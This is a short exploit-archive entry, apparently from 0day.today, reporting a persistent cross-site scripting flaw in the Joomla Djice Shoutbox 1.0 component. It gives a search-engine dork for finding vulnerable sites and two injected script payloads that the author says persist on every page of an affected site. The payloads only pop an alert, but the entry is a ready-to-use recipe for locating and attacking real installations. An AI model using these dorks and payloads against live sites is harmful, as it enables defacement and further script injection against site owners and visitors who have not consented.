id: 4927
date: 03/10/2009
title: Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability
author: XaDoS
cves: 

=====================================================
Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability
=====================================================



 
- dork: inurl:"index.php?option=com_djiceshoutbox"
 
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
 
"><script>alert('XaDoS')</script>
 
or

'">><script>alert('XSS By XaDoS')</script>
 
the XSS become permanent in every page of site!
not critical damage but it's not funny..



#  0day.today [2023-03-25]  #